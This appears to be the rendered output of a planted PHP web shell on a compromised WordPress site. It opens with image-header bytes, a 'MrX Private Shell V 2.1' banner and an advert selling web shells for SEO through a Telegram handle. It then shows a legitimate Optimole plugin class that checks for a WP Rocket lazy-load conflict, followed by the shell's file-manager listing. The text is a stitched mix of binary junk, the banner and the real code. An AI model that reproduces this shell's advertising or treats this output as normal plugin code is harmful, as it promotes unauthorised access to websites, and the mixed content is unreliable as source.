����JFIF���������
__ __ __ __ _____ _ _ _____ _ _ _ | \/ | \ \ / / | __ \ (_) | | / ____| | | | | | \ / |_ __\ V / | |__) | __ ___ ____ _| |_ ___ | (___ | |__ ___| | | | |\/| | '__|> < | ___/ '__| \ \ / / _` | __/ _ \ \___ \| '_ \ / _ \ | | | | | | |_ / . \ | | | | | |\ V / (_| | || __/ ____) | | | | __/ | | |_| |_|_(_)_/ \_\ |_| |_| |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1 if you need WebShell for Seo everyday contact me on Telegram Telegram Address : @jackleetFor_More_Tools:
<?php
/**
* Class Optml_Wprocket
*
* An example of a conflict.
*/
class Optml_Wprocket extends Optml_Abstract_Conflict {
/**
* Optml_Wprocket constructor.
*/
public function __construct() {
$this->severity = self::SEVERITY_MEDIUM;
parent::__construct();
}
/**
* Set the message property
*
* @since 2.0.6
* @access public
*/
public function define_message() {
$this->message = sprintf( /* translators: 1 is the start of the bold tag, 2 is ending bold tag, 3 is new line tag, 4 is anchor tag start, 5 is ending anchor tag */__( 'It seems your are using %1$sWP Rocket%2$s with Lazy loading for images option active. %3$s Optimole already provides a lazy loading mechanism by it\'s own which might conflict with this. If you would like to further use Optimole lazy loading feature, you can turn that off from %4$sSettings -> WP Rocket -> Media%5$s page.', 'optimole-wp' ), '<b>', '</b>', '<br/>', '<a target="_blank" href="' . admin_url( 'options-general.php?page=wprocket#media' ) . '">', '</a>' );
}
/**
* Determine if conflict is applicable.
*
* @return bool
* @since 2.0.6
* @access public
*/
public function is_conflict_valid() {
if ( ! is_plugin_active( 'wp-rocket/wp-rocket.php' ) ) {
return false;
}
if ( ! function_exists( 'get_rocket_option' ) ) {
return false;
}
return get_rocket_option( 'lazyload', false );
}
}
| Name | Type | Size | Permission | Actions |
|---|---|---|---|---|
| abstract_conflict.php | File | 2.73 KB | 0644 |
|
| conflict_manager.php | File | 3.45 KB | 0644 |
|
| divi.php | File | 2.13 KB | 0644 |
|
| jetpack_lazyload.php | File | 1.5 KB | 0644 |
|
| jetpack_photon.php | File | 1.39 KB | 0644 |
|
| w3_total_cache_cdn.php | File | 1.4 KB | 0644 |
|
| wprocket.php | File | 1.36 KB | 0644 |
|